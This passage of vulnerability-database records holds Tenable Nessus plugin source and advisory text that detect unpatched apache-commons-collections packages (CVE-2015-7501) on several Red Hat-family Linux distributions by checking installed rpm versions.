\"jakarta-commons-collections / jakarta-commons-collections-javadoc / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:45:16", "description": "It was found that the Apache commons-collections 
library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nIn the interim, the quickest way to resolve this specific deserialization vulnerability is to remove the vulnerable class files (InvokerTransformer, InstantiateFactory, and InstantiateTransformer) in all commons-collections jar files. Any manual changes should be tested to avoid unforeseen complications.\n\nAll running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : apache-commons-collections on SL7.x (noarch) (20151130)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:apache-commons-collections", "p-cpe:/a:fermilab:scientific_linux:apache-commons-collections-javadoc", "p-cpe:/a:fermilab:scientific_linux:apache-commons-collections-testframework", "p-cpe:/a:fermilab:scientific_linux:apache-commons-collections-testframework-javadoc", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20151130_APACHE_COMMONS_COLLECTIONS_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/87120", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87120);\n 
script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7501\");\n\n script_name(english:\"Scientific Linux Security Update : apache-commons-collections on SL7.x (noarch) (20151130)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons- collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-\ncollections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nIn the interim, the quickest way to resolve this specific\ndeserialization vulnerability is to remove the vulnerable class files\n(InvokerTransformer, InstantiateFactory, and InstantiateTransformer)\nin all commons-collections jar files. 
Any manual changes should be\ntested to avoid unforseen complications.\n\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1511&L=scientific-linux-errata&F=&S=&P=17483\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4e414258\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:apache-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:apache-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:apache-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:apache-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", reference:\"apache-commons-collections-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"apache-commons-collections-javadoc-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"apache-commons-collections-testframework-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"apache-commons-collections-testframework-javadoc-3.2.1-22.el7_2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = 
pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections / apache-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:46:16", "description": "Updated apache-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of apache-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. 
All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-02T00:00:00", "type": "nessus", "title": "CentOS 7 : apache-commons-collections (CESA-2015:2522)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:apache-commons-collections", "p-cpe:/a:centos:centos:apache-commons-collections-javadoc", "p-cpe:/a:centos:centos:apache-commons-collections-testframework", "p-cpe:/a:centos:centos:apache-commons-collections-testframework-javadoc", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2015-2522.NASL", "href": "https://www.tenable.com/plugins/nessus/87161", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2522 and \n# CentOS Errata and Security Advisory 2015:2522 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87161);\n script_version(\"2.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2522\");\n\n script_name(english:\"CentOS 7 : apache-commons-collections (CESA-2015:2522)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated apache-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Apache Commons Collections library provides new interfaces,\nimplementations, and utilities to extend the features of the Java\nCollections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of apache-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. 
All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2015-December/002725.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b562fa0b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache-commons-collections packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apache-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apache-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apache-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apache-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/02\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"apache-commons-collections-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"apache-commons-collections-javadoc-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"apache-commons-collections-testframework-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"apache-commons-collections-testframework-javadoc-3.2.1-22.el7_2\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this 
vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections / apache-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:44:57", "description": "From Red Hat Security Advisory 2015:2522 :\n\nUpdated apache-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. 
Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of apache-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-01T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : apache-commons-collections (ELSA-2015-2522)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:apache-commons-collections", "p-cpe:/a:oracle:linux:apache-commons-collections-javadoc", "p-cpe:/a:oracle:linux:apache-commons-collections-testframework", "p-cpe:/a:oracle:linux:apache-commons-collections-testframework-javadoc", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2015-2522.NASL", "href": "https://www.tenable.com/plugins/nessus/87119", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:2522 and \n# Oracle Linux Security Advisory ELSA-2015-2522 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87119);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2522\");\n\n script_name(english:\"Oracle Linux 7 : apache-commons-collections (ELSA-2015-2522)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n 
value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:2522 :\n\nUpdated apache-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Apache Commons Collections library provides new interfaces,\nimplementations, and utilities to extend the features of the Java\nCollections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of apache-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. 
All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-November/005594.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache-commons-collections packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apache-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apache-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apache-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apache-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"apache-commons-collections-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"apache-commons-collections-javadoc-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"apache-commons-collections-testframework-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"apache-commons-collections-testframework-javadoc-3.2.1-22.el7_2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections / apache-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:45:53", "description": "Updated packages that fix one security issue for the Apache commons-collections library for Red Hat JBoss Enterprise Application Platform 6.3 are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3 on Red Hat Enterprise Linux 6 are advised to upgrade to these updated packages. The JBoss server process must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-04T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 / 7 : JBoss EAP (RHSA-2015:2536)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-eap6", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2015-2536.NASL", "href": "https://www.tenable.com/plugins/nessus/87191", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2536. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87191);\n script_version(\"2.21\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2536\");\n\n script_name(english:\"RHEL 5 / 6 / 7 : JBoss EAP (RHSA-2015:2536)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated packages that fix one security issue for the Apache\ncommons-collections library for Red Hat JBoss Enterprise Application\nPlatform 6.3 are now available for Red Hat Enterprise Linux 5, 6, and\n7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3 on Red\nHat Enterprise Linux 6 are advised to upgrade to these updated\npackages. 
The JBoss server process must be restarted for the update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/solutions/2045023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2536\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7501\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache-commons-collections-eap6 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
